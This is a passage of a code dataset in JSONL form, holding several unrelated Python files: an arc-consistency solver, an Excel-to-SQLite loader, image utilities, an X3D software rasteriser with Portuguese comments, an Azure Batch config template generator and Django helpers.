iterations/states\n\t\tif ret_changes:\n\t\t\treturn changes\n\n\t\treturn None\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) < 4:\n\t\tprint(\"usage:\", sys.argv[0], \n\t\t\t\" \",\n\t\t\t\" [separator - default is \\\",\\\"]\")\n\t\texit(1)\n\n\ttry:\n\t\tsep = sys.argv[4]\n\t\tif not sep:\n\t\t\traise Exception\n\texcept:\n\t\tsep = \",\"\n\n\tac = ArcConsistency(filepath=sys.argv[1], sep=sep)\n\n\tac.print_graph()\n\n\tac.refreshDomain()\n\n\tchanges = ac.consistentAttrib(sys.argv[2], sys.argv[3])\n\n\tprint(\"\\nValues:\")\n\tfor vertex in ac.value:\n\t\tprint(vertex, \"\\t:\", ac.value[vertex])\n\n\tprint(\"\\nDomains:\")\n\tfor vertex in ac.domain:\n\t\tprint(vertex, \"\\t:\", ac.domain[vertex])\n\n\tprint(\"\\nChanges made:\", 
changes)\n","sub_path":"constraint-satisfaction-problems/coloring-maps/arcconsistency.py","file_name":"arcconsistency.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"165884670","text":"# Author: lindafang\n# Date: 2020-08-14 10:45\n# File: get_yaml.py\n\nimport yaml\n\n\ndef get_yaml_data(yaml_file):\n # 打开yaml文件\n with open(yaml_file, 'r', encoding=\"utf-8\") as file:\n file_data = file.read()\n\n data = yaml.load(file_data)\n return data\n","sub_path":"src/chapter10appium/Pappium-youdao-demo/utils/get_yaml.py","file_name":"get_yaml.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"87162235","text":"import sqlite3\nimport openpyxl\nfrom openpyxl import load_workbook\nimport re\nimport datetime\nimport calendar\n\n# # Get last month date in format -> 'August2018'\n# today = datetime.datetime.now()\n# first = today.replace(day=1)\n# lastMonth = first - datetime.timedelta(days=1)\n# year = str(lastMonth.year)\n# month = str(calendar.month_name[lastMonth.month] + year)\n\n# Replace with the database name\ndb = '/Users/troysmith/Code/SarnowFoodGroup/DB/orders.db'\ncon = sqlite3.connect(db)\nprint('Connected to DB')\n\n# Replace with the complete path to youe excel workbook\nwb = load_workbook(filename='orders.xlsx')\n\n# def slugify(text, lower=1):\n# if lower == 1:\n# text = text.strip().lower()\n# text = re.sub(r'[^\\w _-]+', '', text)\n# text = re.sub(r'[- ]+', '_', text)\n# return text\n\nsheets = ['Sheet1']\n\ncount = 1\nfor sheet in sheets:\n ws = wb[sheet] \n columns= ['date', 'status', 'vendor', 'po_no', 'sarnow_no', 'qty']\n # con.execute('DROP TABLE orders')\n # query = 'CREATE TABLE orders (ID INTEGER PRIMARY KEY AUTOINCREMENT'\n # for row in next(ws.rows):\n # query += ', ' + str(row.value) + ' TEXT'\n # columns.append(str(row.value))\n # query += ');'\n # # print(query)\n # con.execute(query)\n\n tup = []\n for i, rows in enumerate(ws):\n tuprow = []\n if i == 0:\n continue\n for row in rows:\n tuprow.append(str(row.value).strip()) if str(row.value).strip() != 'None' else tuprow.append('')\n tup.append(tuple(tuprow)[:-2])\n\n insQuery1 = 'INSERT INTO orders ('\n insQuery2 = ''\n for col in columns:\n insQuery1 += col + ', '\n insQuery2 += '?, '\n insQuery1 = insQuery1[:-2] + ') VALUES('\n insQuery2 = insQuery2[:-2] + ')'\n insQuery = insQuery1 + insQuery2\n\n con.executemany(insQuery, tup)\n con.commit()\n\ncon.close()\nprint('Successfully Extracted Data and Loaded Database {}'.format(db))","sub_path":"Functions/CreateOrdersDB.py","file_name":"CreateOrdersDB.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"89292365","text":"import base64\r\nimport cv2\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\ndef parse_app_did_layer(appdidlayer): \r\n app_list = appdidlayer.split('~')\r\n appdidlayer_flat = []\r\n for app in app_list:\r\n level0 = app.split('#')\r\n app_name = level0[0]\r\n app_version = level0[1]\r\n for tmp in level0[2:]:\r\n level1 = tmp.split('|')\r\n did = level1[0]\r\n for tmp_layer in level1[1:]:\r\n appdidlayer_element = []\r\n appdidlayer_element.append(app_name)\r\n appdidlayer_element.append(app_version)\r\n appdidlayer_element.append(did)\r\n appdidlayer_element.append(tmp_layer.replace('%',' '))\r\n # Append element\r\n 
appdidlayer_flat.append(appdidlayer_element)\r\n return pd.DataFrame(appdidlayer_flat, columns=['app', 'version', 'designid', 'step'])\r\n\r\n\r\ndef convert_image_base64_to_array(basestring, channel_flag=-1):\r\n \"\"\"\r\n Generate matrix image from basestring\r\n :param basestring: basestring to convert to image\r\n :return: Numpy array\r\n \"\"\"\r\n imgdata = base64.b64decode(basestring)\r\n arr = np.asarray(bytearray(imgdata), dtype=np.uint8)\r\n if channel_flag == -1:\r\n # Channels are in RGB order\r\n return cv2.cvtColor(cv2.imdecode(arr, -1), cv2.COLOR_BGR2RGB)\r\n elif channel_flag == -2:\r\n # Channels are in BGR order: Default in opencv\r\n return cv2.imdecode(arr, -1)\r\n ","sub_path":"src/pipeline/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"523563317","text":"# Desenvolvido por: Luciano Soares \n# Disciplina: Computação Gráfica\n# Data: 28 de Agosto de 2020\n\nimport argparse # Para tratar os parâmetros da linha de comando\nimport x3d # Faz a leitura do arquivo X3D, gera o grafo de cena e faz traversal\nimport interface # Janela de visualização baseada no Matplotlib\nimport gpu # Simula os recursos de uma GPU\n\nimport numpy as np\n\nimport math\n\nfrom math import sin, cos \n\nstack = [\n [[1,0,0,0],\n [0,1,0,0],\n [0,0,1,0],\n [0,0,0,1]]\n]\n\n\n\ndef lineCrossLine(x0, y0, x1, y1, x2, y2, x3, y3):\n if (max(x0,x1) < min(x2,x3)):\n return False \n \n a1 = (y0-y1)/(x0-x1)\n a2 = (y2-y3)/(x2-x3)\n b1 = y0 - a1*x0\n b2 = y2 - a2*x2\n\n if a1 == a2:\n return False\n \n xa = (b2 - b1) / (a1 - a2)\n\n if ( (xa < max( min(x0,x1), min(x2,x3) )) or\n (xa > min( max(x0,x1), max(x2,x3) )) ):\n return False \n else:\n return True\n\ndef shouldPaintPixel(x, y, x0, y0, x1, y1):\n diamondPoints = [(x+0.5, y), (x, y+0.5), (x+1, y+0.5), (x+0.5, y+1)]\n diamondLines = [[diamondPoints[0], diamondPoints[2]], [diamondPoints[2], diamondPoints[3]], [diamondPoints[3], diamondPoints[1]], [diamondPoints[1], diamondPoints[0]]]\n\n for line in diamondLines:\n if lineCrossLine(x0, y0, x1, y1, line[0][0], line[0][1], line[1][0], line[1][1]):\n return True\n \n return False\n\ndef polypoint2D(point, color):\n \"\"\" Função usada para renderizar Polypoint2D. \"\"\"\n color = [color[0]*255, color[1]*255, color[2]*255]\n\n for i in range(len(point)):\n point[i] = int(point[i])\n\n for x in range(gpu.GPU.width):\n for y in range(0, gpu.GPU.height):\n x_point_index = 0\n y_point_index = 1\n\n while x_point_index != len(point):\n if point[x_point_index] == x and point[y_point_index] == y:\n gpu.GPU.set_pixel(x, y, color[0], color[1], color[2])\n\n x_point_index += 2\n y_point_index += 2\n\ndef polyline2D(lineSegments, color):\n \"\"\" Função usada para renderizar Polyline2D. 
\"\"\"\n \n color = [color[0]*255, color[1]*255, color[2]*255]\n\n for x in range(gpu.GPU.width):\n for y in range(gpu.GPU.height):\n if shouldPaintPixel(x, y, lineSegments[0], lineSegments[1], lineSegments[2], lineSegments[3]):\n gpu.GPU.set_pixel(x, y, color[0], color[1], color[2])\n\n\n# funçoes daqui https://www.geeksforgeeks.org/check-whether-a-given-point-lies-inside-a-triangle-or-not/\ndef areaTriangle(x1, y1, x2, y2, x3, y3): \n \n return abs((x1 * ((y2) - y3) + x2 * (y3 - y1) \n + x3 * (y1 - y2)) / 2.0) \n\ndef isInside(x1, y1, x2, y2, x3, y3, x, y): \n \n A = areaTriangle(x1, y1, x2, y2, x3, y3) \n\n A1 = areaTriangle(x, y, x2, y2, x3, y3) \n \n A2 = areaTriangle(x1, y1, x, y, x3, y3) \n \n A3 = areaTriangle(x1, y1, x2, y2, x, y) \n \n if(round(A,4) == round(A1 + A2 + A3, 4)): \n return True\n else:\n return False\n\ndef triangleSet2D(vertices, color, texture_list, image):\n \"\"\" Função usada para renderizar TriangleSet2D. \"\"\"\n # print(texture_list)\n # color = [color[0]*255, color[1]*255, color[2]*255]\n colors = [[color[i]*255, color[i+1]*255, color[i+2]*255] for i in range(0, len(color), 3)]\n\n x1 = vertices[0]\n y1 = vertices[1]\n\n x2 = vertices[2]\n y2 = vertices[3]\n\n x3 = vertices[4]\n y3 = vertices[5]\n\n # # sem antialiazing\n # for x in range(gpu.GPU.width):\n # for y in range(gpu.GPU.height):\n\n # if isInside(vertices[0], vertices[1], vertices[2], vertices[3], vertices[4], vertices[5], x+0.5, y+0.5):\n # gpu.GPU.set_pixel(x, y, color[0], color[1], color[2])\n\n\n # com antialiazing\n S = [(0.25, 0.25), (0.75, 0.25), (0.75, 0.75), (0.25, 0.75)]\n \n for x in range(gpu.GPU.width):\n for y in range(gpu.GPU.height):\n quant = 0\n for s in S:\n if isInside(vertices[0], vertices[1], vertices[2], vertices[3], vertices[4], vertices[5], x+s[0], y+s[1]):\n quant += 1\n if quant > 0:\n dif = quant/4\n\n alpha = (-(x - x2)*(y3 - y2) + (y - y2)*(x3 - x2))/(-(x1 - x2)*(y3 - y2) + (y1 - y2)*(x3 - x2))\n beta = (-(x - x3)*(y1 - y3) + (y - y3)*(x1 - x3))/(-(x2 - x3)*(y1 - y3) + (y2 - y3)*(x1 - x3))\n gama = 1 - alpha - beta\n\n if len(texture_list):\n p1 = [alpha*texture_list[0], alpha*texture_list[1]]\n p2 = [beta*texture_list[2], beta*texture_list[3]]\n p3 = [gama*texture_list[4], gama*texture_list[5]]\n\n u = int((p1[0] + p2[0] + p3[0]) * len(image[0])-1)\n v = int((p1[1] + p2[1] + p3[1]) * len(image)-1)\n\n # print(p1, p2, p3)\n \n tex_color = image[u][v]\n \n gpu.GPU.set_pixel(x, y, (tex_color[0])*(dif),(tex_color[1])*(dif), (tex_color[2])*(dif))\n \n\n else:\n p1 = [c*alpha for c in colors[0]]\n p2 = [c*beta for c in colors[1]]\n p3 = [c*gama for c in colors[2]]\n\n gpu.GPU.set_pixel(x, y, (p1[0]+p2[0]+p3[0])*(dif),(p1[1]+p2[1]+p3[1])*(dif), (p1[2]+p2[2]+p3[2])*(dif))\n # gpu.GPU.set_pixel(x, y, color[0]*(dif), color[1]*(dif), color[2]*(dif))\n\n\ndef matrixToArray(matrix):\n arr = []\n for i in range(3):\n arr.append(int(matrix[0][i]))\n arr.append(int(matrix[1][i]))\n return arr\n\ndef triangleSet(point, color, texture_list = [], image = None):\n \"\"\" Função usada para renderizar TriangleSet. \"\"\"\n # Nessa função você receberá pontos no parâmetro point, esses pontos são uma lista\n # de pontos x, y, e z sempre na ordem. Assim point[0] é o valor da coordenada x do\n # primeiro ponto, point[1] o valor y do primeiro ponto, point[2] o valor z da \n # coordenada z do primeiro ponto. 
Já point[3] é a coordenada x do segundo ponto e\n # assim por diante.\n # No TriangleSet os triângulos são informados individualmente, assim os três\n # primeiros pontos definem um triângulo, os três próximos pontos definem um novo\n # triângulo, e assim por diante.\n\n triangleMatrixes = []\n\n # print(\"==================\")\n # print(len(point))\n # print(point)\n\n for i in range(0,len(point),9):\n triangleMatrixes.append([[point[i], point[i+3], point[i+6]], \n [point[i+1], point[i+4], point[i+7]], \n [point[i+2], point[i+5], point[i+8]],\n [1, 1, 1 ]])\n\n\n for matrix in triangleMatrixes:\n\n temp = np.matmul(stack[-1], np.array(matrix))\n temp2 = np.matmul(lookAt, temp)\n temp3 = np.matmul(projectionMatrix, temp2)\n temp35 = temp3 / temp3[3][0]\n temp4 = np.matmul(screenMatrix, temp35)\n triangleSet2D(matrixToArray(temp4), color, texture_list, image)\n\n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"TriangleSet : pontos = {0}\".format(point)) # imprime no terminal pontos\n\ndef viewpoint(position, orientation, fieldOfView):\n \"\"\" Função usada para renderizar (na verdade coletar os dados) de Viewpoint. \"\"\"\n # Na função de viewpoint você receberá a posição, orientação e campo de visão da\n # câmera virtual. Use esses dados para poder calcular e criar a matriz de projeção\n # perspectiva para poder aplicar nos pontos dos objetos geométricos.\n \n global lookAt\n global LARGURA\n global ALTURA\n global projectionMatrix\n\n orientationMatrix = getRotationMatrix([orientation[0], orientation[1], orientation[2], -orientation[3]])\n\n # orientationMatrix = np.identity(4)\n\n translationMatrix = [\n [1,0,0,-position[0]],\n [0,1,0,-position[1]],\n [0,0,1,-position[2]],\n [0,0,0, 1]\n ]\n\n lookAt = np.matmul(orientationMatrix, translationMatrix)\n\n aspect = LARGURA/ALTURA\n fovy = fieldOfView\n near = 0.5\n top = near * math.tan(fovy)\n right = top * aspect\n far = 100\n\n projectionMatrix = [\n [near/right, 0, 0, 0],\n [ 0, near/top, 0, 0],\n [ 0, 0, -((far+near)/(far-near)), (-2*far*near)/(far-near)],\n [ 0, 0, -1, 0]\n ]\n\n print(np.array(lookAt))\n print(np.array(projectionMatrix))\n\n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"Viewpoint : position = {0}, orientation = {1}, fieldOfView = {2}\".format(position, orientation, fieldOfView)) # imprime no terminal\n\ndef getRotationMatrix(rotation):\n theta = rotation[3]\n if rotation[0]:\n #x\n return [\n [1, 0, 0, 0],\n [0, cos(theta), -sin(theta), 0],\n [0, sin(theta), cos(theta), 0],\n [0, 0, 0, 1]\n ]\n elif rotation[1]:\n #y\n return [\n [cos(theta), 0, sin(theta), 0],\n [0, 1, 0, 0],\n [-sin(theta), 0, cos(theta), 0],\n [0, 0, 0, 1]\n ]\n elif rotation[2]:\n #z\n return [\n [cos(theta), -sin(theta), 0, 0],\n [sin(theta), cos(theta), 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]\n ]\n else:\n return[\n [1,0,0,0],\n [0,1,0,0],\n [0,0,1,0],\n [0,0,0,1]\n ]\n\n\n\ndef transform(translation, scale, rotation):\n \"\"\" Função usada para renderizar (na verdade coletar os dados) de Transform. \"\"\"\n # A função transform será chamada quando se entrar em um nó X3D do tipo Transform\n # do grafo de cena. 
Os valores passados são a escala em um vetor [x, y, z]\n # indicando a escala em cada direção, a translação [x, y, z] nas respectivas\n # coordenadas e finalmente a rotação por [x, y, z, t] sendo definida pela rotação\n # do objeto ao redor do eixo x, y, z por t radianos, seguindo a regra da mão direita.\n # Quando se entrar em um nó transform se deverá salvar a matriz de transformação dos\n # modelos do mundo em alguma estrutura de pilha.\n\n newMatrix = stack[-1].copy()\n\n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"Transform : \", end = '')\n if scale:\n scaleMatrix = [[scale[0], 0, 0, 0],\n [0, scale[1],0, 0],\n [0, 0, scale[2],0], \n [0, 0, 0, 1]]\n\n # newMatrix = np.matmul(scaleMatrix, newMatrix)\n newMatrix = np.matmul(newMatrix, scaleMatrix)\n print(\"scale = {0} \".format(scale), end = '') # imprime no terminal\n if rotation:\n rotationMatrix = getRotationMatrix(rotation)\n # newMatrix = np.matmul(rotationMatrix, newMatrix)\n newMatrix = np.matmul(newMatrix, rotationMatrix)\n\n print(\"rotation = {0} \".format(rotation), end = '') # imprime no terminal\n if translation:\n translationMatrix = [[1,0,0,translation[0]],\n [0,1,0,translation[1]],\n [0,0,1,translation[2]], \n [0,0,0, 1]]\n # newMatrix = np.matmul(translationMatrix, newMatrix)\n newMatrix = np.matmul(newMatrix, translationMatrix)\n print(\"translation = {0} \".format(translation), end = '') # imprime no terminal\n \n stack.append(newMatrix)\n # for m in stack:\n # print(m)\n # print()\n # print(\"\")\n\ndef _transform():\n \"\"\" Função usada para renderizar (na verdade coletar os dados) de Transform. \"\"\"\n # A função _transform será chamada quando se sair em um nó X3D do tipo Transform do\n # grafo de cena. Não são passados valores, porém quando se sai de um nó transform se\n # deverá recuperar a matriz de transformação dos modelos do mundo da estrutura de\n # pilha implementada.\n\n stack.pop()\n\n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"Saindo de Transform\")\n\ndef triangleStripSet(point, stripCount, color):\n \"\"\" Função usada para renderizar TriangleStripSet. \"\"\"\n # A função triangleStripSet é usada para desenhar tiras de triângulos interconectados,\n # você receberá as coordenadas dos pontos no parâmetro point, esses pontos são uma\n # lista de pontos x, y, e z sempre na ordem. Assim point[0] é o valor da coordenada x\n # do primeiro ponto, point[1] o valor y do primeiro ponto, point[2] o valor z da\n # coordenada z do primeiro ponto. Já point[3] é a coordenada x do segundo ponto e assim\n # por diante. 
No TriangleStripSet a quantidade de vértices a serem usados é informado\n # em uma lista chamada stripCount (perceba que é uma lista).\n\n newPoint = []\n\n for I in range(int(stripCount[0]-2)):\n i = 3*I\n for j in range(9):\n newPoint.append(point[i+j])\n\n \n # newPoint.append(point[i+1])\n # newPoint.append(point[i+2])\n # newPoint.append(point[i+3])\n # newPoint.append(point[i+4])\n # newPoint.append(point[i+5])\n # newPoint.append(point[i+6])\n # newPoint.append(point[i+7])\n # newPoint.append(point[i+8])\n \n triangleSet(newPoint, color)\n\n\n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"TriangleStripSet : pontos = {0} \".format(point), end = '') # imprime no terminal pontos\n for i, strip in enumerate(stripCount):\n print(\"strip[{0}] = {1} \".format(i, strip), end = '') # imprime no terminal\n print(\"\")\n\ndef indexedTriangleStripSet(point, index, color):\n \"\"\" Função usada para renderizar IndexedTriangleStripSet. \"\"\"\n # A função indexedTriangleStripSet é usada para desenhar tiras de triângulos\n # interconectados, você receberá as coordenadas dos pontos no parâmetro point, esses\n # pontos são uma lista de pontos x, y, e z sempre na ordem. Assim point[0] é o valor\n # da coordenada x do primeiro ponto, point[1] o valor y do primeiro ponto, point[2]\n # o valor z da coordenada z do primeiro ponto. Já point[3] é a coordenada x do\n # segundo ponto e assim por diante. No IndexedTriangleStripSet uma lista informando\n # como conectar os vértices é informada em index, o valor -1 indica que a lista\n # acabou. A ordem de conexão será de 3 em 3 pulando um índice. Por exemplo: o\n # primeiro triângulo será com os vértices 0, 1 e 2, depois serão os vértices 1, 2 e 3,\n # depois 2, 3 e 4, e assim por diante.\n newPoint = []\n for I in range(len(index)):\n if index[I+2] == -1:\n break\n i = 3*int(index[I])\n for j in range(9):\n newPoint.append(point[i+j])\n\n triangleSet(newPoint, color)\n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"IndexedTriangleStripSet : pontos = {0}, index = {1}\".format(point, index)) # imprime no terminal pontos\n\ndef box(size, color):\n \"\"\" Função usada para renderizar Boxes. \"\"\"\n # A função box é usada para desenhar paralelepípedos na cena. O Box é centrada no\n # (0, 0, 0) no sistema de coordenadas local e alinhado com os eixos de coordenadas\n # locais. O argumento size especifica as extensões da caixa ao longo dos eixos X, Y\n # e Z, respectivamente, e cada valor do tamanho deve ser maior que zero. Para desenha\n # essa caixa você vai provavelmente querer tesselar ela em triângulos, para isso\n # encontre os vértices e defina os triângulos.\n\n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"Box : size = {0}\".format(size)) # imprime no terminal pontos\n\n x = size[0]/2\n y = size[1]/2\n z = size[2]/2\n\n p0 = [x,y,z]\n p1 = [x,y,-z]\n p2 = [x,-y,z]\n p3 = [x,-y,-z]\n p4 = [-x,y,z]\n p5 = [-x,-y,z]\n p6 = [-x,-y,-z]\n p7 = [-x,y,-z]\n \n triangleStripSet(p0+p1+p2+p3+p4+p5+p6+p7+p0+p1, [8], color)\n triangleStripSet(p2+p0+p6+p4, [4], color)\n triangleStripSet(p5+p7+p1+p3, [4], color)\n\nLARGURA = 800#300\nALTURA = 400#200\n\ndef indexedFaceSet(coord, coordIndex, colorPerVertex, color, colorIndex, texCoord, texCoordIndex, current_color, current_texture):\n \"\"\" Função usada para renderizar IndexedFaceSet. \"\"\"\n # A função indexedFaceSet é usada para desenhar malhas de triângulos. 
Ela funciona de\n # forma muito simular a IndexedTriangleStripSet porém com mais recursos.\n # Você receberá as coordenadas dos pontos no parâmetro cord, esses\n # pontos são uma lista de pontos x, y, e z sempre na ordem. Assim point[0] é o valor\n # da coordenada x do primeiro ponto, point[1] o valor y do primeiro ponto, point[2]\n # o valor z da coordenada z do primeiro ponto. Já point[3] é a coordenada x do\n # segundo ponto e assim por diante. No IndexedFaceSet uma lista informando\n # como conectar os vértices é informada em coordIndex, o valor -1 indica que a lista\n # acabou. A ordem de conexão será de 3 em 3 pulando um índice. Por exemplo: o\n # primeiro triângulo será com os vértices 0, 1 e 2, depois serão os vértices 1, 2 e 3,\n # depois 2, 3 e 4, e assim por diante.\n # Adicionalmente essa implementação do IndexedFace suport cores por vértices, assim\n # a se a flag colorPerVertex estiver habilidades, os vértices também possuirão cores\n # que servem para definir a cor interna dos poligonos, para isso faça um cálculo\n # baricêntrico de que cor deverá ter aquela posição. Da mesma forma se pode definir uma\n # textura para o poligono, para isso, use as coordenadas de textura e depois aplique a\n # cor da textura conforme a posição do mapeamento. Dentro da classe GPU já está\n # implementadado um método para a leitura de imagens.\n \n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"IndexedFaceSet : \")\n print('coord', coord)\n print('texCoord', texCoord)\n print('texCoordIndex', texCoordIndex)\n print('coordIndex', coordIndex)\n\n if coord:\n \n points = []\n \n for i in range(0, len(coord), 3):\n points.append([ coord[i], coord[i+1], coord[i+2] ])\n \n # print(\"\\n\\tpontos(x, y, z) = {0}, coordIndex = {1}\".format(coord, coordIndex)) # imprime no terminal\n\n if colorPerVertex:\n # print(\"\\n\\tcores(r, g, b) = {0}, colorIndex = {1}\".format(color, colorIndex)) # imprime no terminal\n color_list = []\n\n for i in range(0, len(color), 3):\n color_list.append([ color[i], color[i+1], color[i+2] ])\n\n for j in range(0, len(coordIndex), 4):\n triangleSet(points[coordIndex[j]] + points[coordIndex[j+1]] + points[coordIndex[j+2]], color_list[coordIndex[j]] + color_list[coordIndex[j+1]] + color_list[coordIndex[j+2]])\n\n if(current_texture):\n image = gpu.GPU.load_texture(current_texture[0])\n\n if texCoord:\n \n # for i in range(0, len(texCoordIndex), 4):\n # texture_list.append([\n # texCoord[texCoordIndex[i]], texCoord[texCoordIndex[i]+1],\n # texCoord[texCoordIndex[i+1]], texCoord[texCoordIndex[i+1]+1],\n # texCoord[texCoordIndex[i+2]], texCoord[texCoordIndex[i+2]+1],\n # ])\n # print('texture_list', texture_list)\n \n tex_points = []\n\n for i in range(0, len(texCoord), 2):\n tex_points.append([ texCoord[i], texCoord[i+1] ])\n\n for j in range(0, len(coordIndex), 4):\n\n texture_list = tex_points[texCoordIndex[j]] + tex_points[texCoordIndex[j+1]] + tex_points[texCoordIndex[j+2]]\n\n points_list = points[coordIndex[j]] + points[coordIndex[j+1]] + points[coordIndex[j+2]]\n print(texture_list)\n triangleSet(points_list, [], texture_list, image)\n\n # print(\"\\n\\tpontos(u, v) = {0}, texCoordIndex = {1}\".format(texCoord, texCoordIndex)) # imprime no terminal\n\n\nscreenMatrix = [\n [LARGURA/2, 0, 0, LARGURA/2],\n [ 0, -ALTURA/2, 0, ALTURA/2],\n [ 0, 0, 0, 0],\n [ 0, 0, 0, 0]\n]\n\nif __name__ == '__main__':\n\n # Valores padrão da aplicação\n width = LARGURA\n height = ALTURA\n\n x3d_file = \"exemplo9.x3d\"\n # x3d_file = 
\"exemplo4.x3d\"\n # x3d_file = \"exemplo3.x3d\"\n # x3d_file = \"exemplo4.x3d\"\n\n image_file = \"tela.png\"\n\n # Tratando entrada de parâmetro\n parser = argparse.ArgumentParser(add_help=False) # parser para linha de comando\n parser.add_argument(\"-i\", \"--input\", help=\"arquivo X3D de entrada\")\n parser.add_argument(\"-o\", \"--output\", help=\"arquivo 2D de saída (imagem)\")\n parser.add_argument(\"-w\", \"--width\", help=\"resolução horizonta\", type=int)\n parser.add_argument(\"-h\", \"--height\", help=\"resolução vertical\", type=int)\n parser.add_argument(\"-q\", \"--quiet\", help=\"não exibe janela de visualização\", action='store_true')\n args = parser.parse_args() # parse the arguments\n if args.input: x3d_file = args.input\n if args.output: image_file = args.output\n if args.width: width = args.width\n if args.height: height = args.height\n\n # Iniciando simulação de GPU\n gpu.GPU(width, height, image_file)\n\n # Abre arquivo X3D\n scene = x3d.X3D(x3d_file)\n scene.set_resolution(width, height)\n\n # funções que irão fazer o rendering\n x3d.X3D.render[\"Polypoint2D\"] = polypoint2D\n x3d.X3D.render[\"Polyline2D\"] = polyline2D\n x3d.X3D.render[\"TriangleSet2D\"] = triangleSet2D\n x3d.X3D.render[\"TriangleSet\"] = triangleSet\n x3d.X3D.render[\"Viewpoint\"] = viewpoint\n x3d.X3D.render[\"Transform\"] = transform\n x3d.X3D.render[\"_Transform\"] = _transform\n x3d.X3D.render[\"TriangleStripSet\"] = triangleStripSet\n x3d.X3D.render[\"IndexedTriangleStripSet\"] = indexedTriangleStripSet\n x3d.X3D.render[\"Box\"] = box\n x3d.X3D.render[\"IndexedFaceSet\"] = indexedFaceSet\n\n # Se no modo silencioso não configurar janela de visualização\n if not args.quiet:\n window = interface.Interface(width, height)\n scene.set_preview(window)\n\n scene.parse() # faz o traversal no grafo de cena\n\n # Se no modo silencioso salvar imagem e não mostrar janela de visualização\n if args.quiet:\n gpu.GPU.save_image() # Salva imagem em arquivo\n else:\n window.image_saver = gpu.GPU.save_image # pasa a função para salvar imagens\n window.preview(gpu.GPU._frame_buffer) # mostra janela de visualização\n","sub_path":"renderizador.py","file_name":"renderizador.py","file_ext":"py","file_size_in_byte":22902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"500234305","text":"import os\nimport argparse\n\n\ndef _create_default_config(args: argparse.Namespace) -> None:\n import yaml\n\n settings = {\n \"gitsource\": {\n \"url\": \"the url to the git repository\",\n \"branch\": \"master\"\n },\n \"azurebatch\": {\n \"account\": \"the batch account name\",\n \"key\": \"the batch account key\",\n \"endpoint\": \"the batch account endpoint\"\n },\n \"azurestorage\": {\n \"account\": \"the storage account name\",\n \"key\": \"the storage account key\"\n },\n \"automation\": {\n \"account\": \"the service principal for running azure cli live test\",\n \"key\": \"the service principal's password\",\n \"tenant\": \"the service principal's tenant\"\n },\n \"pools\": [\n {\n 'usage': 'usage',\n 'id': 'pool id',\n 'sku': 'batch node agent sku',\n 'image': 'publisher offer sku',\n 'vmsize': 'size',\n 'dedicated': 'number of dedicated node',\n 'low-pri': 'number of low-priority node',\n 'max-tasks': 'number of max tasks per node'\n }\n ]\n }\n\n yaml.safe_dump(settings, args.output, indent=2, encoding='utf-8', default_flow_style=False)\n\n\ndef setup(subparsers) -> None:\n parser = subparsers.add_parser('create-default', help='Create a default config file as 
template.')\n parser.add_argument('--output', help='The path where the default config file is saved.',\n type=argparse.FileType('w'),\n default=open(os.path.join(os.getcwd(), 'default-config.yaml'), 'w'))\n parser.set_defaults(func=_create_default_config)\n","sub_path":"miriam/create_default_config.py","file_name":"create_default_config.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"169091261","text":"import os\nimport datetime\nimport logging\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import transaction, DatabaseError\nfrom django.conf import settings\nfrom imageadmin.models import Directory, DirEntry\nfrom imageadmin.helpers.directoryinfo import list_directory\n\ndef scan_directory(path, wip_file=None):\n \"\"\"\n Scan filesystem directory at path and update directory model in db.\n \n Sets in_progress in DirEnt if wip_file exists.\n \n Does not re-scan filesystem if time since last access is less than DIR_CACHE_TIMEOUT.\n \"\"\"\n try:\n directory = Directory.objects.get(path=path)\n if datetime.datetime.now(tz=datetime.timezone.utc) - directory.last_access_date < settings.DIR_CACHE_TIMEOUT:\n # not ready to re-scan\n logging.debug(f\"directory {path} in cache still valid\")\n return\n\n except ObjectDoesNotExist:\n directory = Directory(path=path)\n directory.save()\n \n # run scanning the directory with database lock on directory to make sure only one scan runs at a time\n with transaction.atomic():\n try:\n directory = Directory.objects.select_for_update(nowait=True).get(path=path)\n logging.debug(f\"scanning directory {path}\")\n # clear dirents\n directory.direntry_set.all().delete()\n # read filesystem directory\n for d in list_directory(path):\n full_path = os.path.join(path, d)\n if wip_file:\n in_progress = os.path.exists(os.path.join(full_path, wip_file))\n else:\n in_progress = False\n \n # create direntry linked to directory\n directory.direntry_set.create(name=d, in_progress=in_progress)\n \n # update access time\n directory.save()\n \n except DatabaseError:\n logging.debug(f\"directory {path} locked - aborting scan\")\n ","sub_path":"renamer/imageadmin/helpers/directory_cache.py","file_name":"directory_cache.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"455005918","text":"from django import forms\nfrom django.core.exceptions import ValidationError\n\nclass ContactForm(forms.Form):\n\tname = forms.CharField(label=\"Your Name:\", max_length=254,\n\t\t\t\t\twidget=forms.TextInput(\n\t\t\t\t\tattrs={\n\t\t\t\t\t\t'placeholder': 'Your name',\n\t\t\t\t\t\t'class': 'form-control contact-input',\n\t\t\t\t\t}))\n\temail = forms.EmailField(label=\"Your Email:\", max_length=254,\n\t\t\t\t\twidget=forms.TextInput(\n\t\t\t\t\tattrs={\n\t\t\t\t\t\t'placeholder': 'Your email 